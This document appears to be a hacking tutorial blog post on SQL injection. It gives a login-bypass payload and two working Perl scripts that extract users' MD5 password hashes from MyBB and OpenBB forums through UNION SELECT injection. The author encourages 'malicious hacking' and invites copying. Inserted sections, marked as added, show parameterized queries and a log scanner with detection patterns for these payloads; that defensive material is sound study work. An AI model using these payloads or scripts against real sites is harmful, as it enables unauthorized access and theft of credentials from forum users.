Let us talk about SQL Injection. It is a very pure hack, in that you are truly outsmarting a system with it. All you need is a web browser to execute this attack. Before reading this, I would recommend reading Hacking Cardomain and Facebook so you get an idea of HTML injection.
First, look for pages that allow you to submit data, e.g. a login page, search page, feedback form, etc. Sometimes HTML pages use the POST method to send parameters to another ASP page, so you may not see the parameters in the URL. However, you can view the source of the HTML and look for the "FORM" tag. You may find something like this:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> tags is a potential parameter that might be useful (exploit wise). These pages will have file types like ASP, JSP, CGI, PL, or PHP. Look especially for URLs that take parameters, like:
http://website/index.asp?id=10
Now, here is an example to show how SQL injection works. Start with the "single quote trick." Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://website/index.asp?id=hi' or 1=1--
If luck is on your side, you will be logged in without a valid login name or password. The reason this works is that the server treats the text you typed as part of the logic statement in its code. For instance, the code says, "Allow a user in if his password is 'correct'", but with your added input the condition becomes "password is 'hi' or 1=1": the single quote closes the string, and the "--" comments out whatever the script appends after it. Of course 1=1 is always true, so you are let in.
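As an added example (not part of the original post), here is the mechanism above shown against a throwaway SQLite database: the vulnerable login builds its query by string concatenation, so the page's "hi' or 1=1--" input rewrites the condition, while the parameterized version hands the same text to the database as data and it matches nothing. The table, user names and passwords are constructed for this demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration; not a real site's users table.
SAMPLE_USERS = [("alice", "correct"), ("bob", "hunter2")]


def build_db():
    """Create an in-memory database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def render_vulnerable_query(name, password):
    """The query text a string-concatenating login page actually sends."""
    # The input is pasted straight into the SQL text, so a single quote in
    # it closes the literal and the rest is parsed as SQL.
    return ("SELECT name FROM users WHERE name = '" + name +
            "' AND password = '" + password + "'")


def login_vulnerable(conn, name, password):
    """Return the matched user name, or None. Vulnerable: input becomes SQL."""
    row = conn.execute(render_vulnerable_query(name, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, name, password):
    """Same check with bound parameters: the input is only ever a value."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (name, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    payload = "hi' or 1=1--"
    print("query sent:", render_vulnerable_query(payload, payload))
    print("vulnerable login:", login_vulnerable(db, payload, payload))
    print("parameterized login:", login_safe(db, payload, payload))
```

With the payload in both fields, the concatenated query reads `... WHERE name = 'hi' or 1=1--' AND password = ...`; everything after `--` is a comment, `1=1` is true for every row, and the first user comes back. The parameterized query compares the literal string `hi' or 1=1--` against the columns and returns nothing.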
Now I will show some examples of automatic SQL injection. This is a MyBulletinBoard injector that will show the MD5 password hash of the user id you have chosen. This was discovered by Alberto Trivero and coded with FAin182.
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1]) {
print "Usage:\nperl $0 [full_target_path] [user_id]\n\n Example:\nperl $0 http://www.example.com/mybb/ 1\n";
exit(0);
}
$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,". "null,null,null,password,null%20FROM%20". "mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
Following is a very simple piece of code that should be an easy illustration of SQL injection. This was written by x97Rang and is meant to work on OpenBB with MySQL.
#!/usr/bin/perl -w
use IO::Socket;
if (@ARGV != 3)
{
print "\nUsage: $0 [server] [path] [id]\n";
print "like $0 forum.mysite.com / 1\n";
print "If found nothing - forum NOT vulnerable\n\n";
exit ();
}
$server = $ARGV[0];
$path = $ARGV[1];
$id = $ARGV[2];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?CID=999+union+select+1,". "1,password,1,1,1,1,1,1,1,1,id,". "1+from+profiles+where+id=". "$id/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$server,$id);
while(<$socket>)
{
if (/\>(\w{32})\</) { print "$1\n"; }
}
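Both scripts above send their payload in the query string of a plain GET request, which means the web server's access log records it verbatim. As an added example (not from the original post or either script's author), the following scanner URL-decodes each parameter in constructed Apache-style log lines and flags the three traits those requests share: a quote-plus-tautology such as "' or 1=1", a "UNION SELECT", and a trailing comment terminator ("--" or "/*"). The log lines, addresses and timestamps are made up for the demonstration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache common format); not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2007:10:00:01 +0000] "GET /index.asp?id=10 HTTP/1.0" 200 512
10.0.0.5 - - [01/Jan/2007:10:00:02 +0000] "GET /index.asp?id=hi'%20or%201=1-- HTTP/1.0" 200 8192
10.0.0.7 - - [01/Jan/2007:10:00:03 +0000] "GET /mybb/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=1/* HTTP/1.0" 200 4096
10.0.0.9 - - [01/Jan/2007:10:00:04 +0000] "GET /index.php?CID=999+union+select+1,1,password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=1/* HTTP/1.0" 200 2048
10.0.0.5 - - [01/Jan/2007:10:00:05 +0000] "GET /search.asp?q=rock+and+roll HTTP/1.0" 200 1024
"""

# Pull the client address and the request URL out of one log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Signatures are applied to each URL-decoded parameter value.
SIGNATURES = [
    # a quote closing a literal, followed by "or <number>=<number>"
    ("tautology", re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),
    # a UNION SELECT splicing a second result set onto the page's query
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    # "--" or "/*" at the end of the value, used to discard the query's tail
    ("comment_terminator", re.compile(r"(--|/\*)\s*$")),
]


def classify_value(value):
    """Return the sorted list of signature names that match one decoded value."""
    return sorted(label for label, pat in SIGNATURES if pat.search(value))


def scan_log(text):
    """Return (ip, url, [signatures]) for every request with at least one hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = set()
        # parse_qsl decodes %20 and '+' and splits each pair on its first '=',
        # so "uid=1/*" inside a value stays part of that value.
        query = urlsplit(m["url"]).query
        for _, value in parse_qsl(query, keep_blank_values=True):
            hits.update(classify_value(value))
        if hits:
            findings.append((m["ip"], m["url"], sorted(hits)))
    return findings


if __name__ == "__main__":
    for ip, url, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits), url, sep="  ")
```

The scanner matches on decoded parameter values rather than the raw request line, because the two scripts encode the same payload differently (`%20` versus `+`), and a rule written against one spelling misses the other. Against the sample log it reports the three injected requests and stays quiet on the two ordinary ones.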
If the human body was never exposed to ailments, it would be impressively vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressively vulnerable to cyber terrorism. Without the creation of malicious hacking, Afghanistan could have destroyed America's economy with a ping flood. This is why I encourage malicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lie. This isn't a 100% information base, as I only publish things I have been able to implement myself. No credit is needed anywhere. However, if you are a publisher, I would appreciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagiarize, then that is my biggest compliment. If my work is good enough, I will be approached and asked to write more... this is natural selection of the digital age.